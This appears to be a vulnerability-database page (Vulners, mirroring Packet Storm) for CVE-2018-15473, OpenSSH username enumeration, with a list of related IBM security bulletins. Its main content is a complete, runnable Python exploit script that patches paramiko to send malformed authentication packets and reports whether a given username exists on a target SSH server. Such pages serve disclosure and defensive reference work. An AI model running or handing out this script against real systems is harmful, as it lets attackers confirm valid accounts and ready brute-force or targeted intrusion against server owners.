Lucene search
K

OpenSSH User Enumeration

🗓️ 05 Dec 2018 00:00:00Reported by Matthew DaleyType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 4656 Views

OpenSSH User Enumeration exploit by Leap Securit

Related
Code
ReporterTitlePublishedViews
Family
IBM Security Bulletins
Security Bulletin: IBM Security Identity Manager Virtual Appliance is affected by multiple vulnerabilities (CVE-2019-4674, CVE-2018-15473, CVE-2019-4675)
3 Feb 202018:50
ibm
IBM Security Bulletins
Security Bulletin: Vulnerability in OpenSSH affects IBM Integrated Analytics System
6 May 202011:00
ibm
IBM Security Bulletins
Security Bulletin: IBM Integrated Management Module II (IMM2) is affected by vulnerabilities in OpenSSH
7 Dec 202322:45
ibm
IBM Security Bulletins
Security Bulletin: Multiple Security Vulnerabilities have been addressed in IBM Security Access Manager Appliance
30 Sep 201921:15
ibm
IBM Security Bulletins
Security Bulletin: IBM MQ Appliance is affected by an OpenSSH vulnerability (CVE-2018-15473)
27 Jan 202010:35
ibm
IBM Security Bulletins
Security Bulletin: IBM Dynamic System Analysis (DSA) Preboot is affected by vulnerabilities in OpenSSH
7 Dec 202322:45
ibm
IBM Security Bulletins
Security Bulletin: IBM Security Directory Suite vulnerable to information disclosure (CVE-2018-15473)
2 Nov 202019:50
ibm
IBM Security Bulletins
Security Bulletin: IBM has announced a release for IBM Security Identity Governance and Intelligence in response to OpenSSH vulnerabilty (CVE-2018-15473).
31 Mar 202022:53
ibm
IBM Security Bulletins
Security Bulletin: IBM Security Guardium is affected by an OpenSSH vulnerability
12 Nov 201915:42
ibm
IBM Security Bulletins
Security Bulletin: IBM BladeCenter Advanced Management Module (AMM) is affected by vulnerability in OpenSSH (CVE-2018-15473)
11 Apr 201921:15
ibm
Rows per page
`#!/usr/bin/env python2  
# CVE-2018-15473 SSH User Enumeration by Leap Security (@LeapSecurity) https://leapsecurity.io  
# Credits: Matthew Daley, Justin Gardner, Lee David Painter  
  
  
import argparse, logging, paramiko, socket, sys, os  
  
class InvalidUsername(Exception):  
pass  
  
# malicious function to malform packet  
def add_boolean(*args, **kwargs):  
pass  
  
# function that'll be overwritten to malform the packet  
old_service_accept = paramiko.auth_handler.AuthHandler._client_handler_table[  
paramiko.common.MSG_SERVICE_ACCEPT]  
  
# malicious function to overwrite MSG_SERVICE_ACCEPT handler  
def service_accept(*args, **kwargs):  
paramiko.message.Message.add_boolean = add_boolean  
return old_service_accept(*args, **kwargs)  
  
# call when username was invalid   
def invalid_username(*args, **kwargs):  
raise InvalidUsername()  
  
# assign functions to respective handlers  
paramiko.auth_handler.AuthHandler._client_handler_table[paramiko.common.MSG_SERVICE_ACCEPT] = service_accept  
paramiko.auth_handler.AuthHandler._client_handler_table[paramiko.common.MSG_USERAUTH_FAILURE] = invalid_username  
  
# perform authentication with malicious packet and username  
def check_user(username):  
sock = socket.socket()  
sock.connect((args.target, args.port))  
transport = paramiko.transport.Transport(sock)  
  
try:  
transport.start_client()  
except paramiko.ssh_exception.SSHException:  
print '[!] Failed to negotiate SSH transport'  
sys.exit(2)  
  
try:  
transport.auth_publickey(username, paramiko.RSAKey.generate(2048))  
except InvalidUsername:  
print "[-] {} is an invalid username".format(username)  
sys.exit(3)  
except paramiko.ssh_exception.AuthenticationException:  
print "[+] {} is a valid username".format(username)  
  
# remove paramiko logging  
logging.getLogger('paramiko.transport').addHandler(logging.NullHandler())  
  
parser = argparse.ArgumentParser(description='SSH User Enumeration by Leap Security (@LeapSecurity)')  
parser.add_argument('target', help="IP address of the target system")  
parser.add_argument('-p', '--port', default=22, help="Set port of SSH service")  
parser.add_argument('username', help="Username to check for validity.")  
  
if len(sys.argv) == 1:  
parser.print_help()  
sys.exit(1)  
  
args = parser.parse_args()  
  
check_user(args.username)  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

05 Dec 2018 00:00Current
6.2Medium risk
Vulners AI Score6.2
EPSS0.98631
4656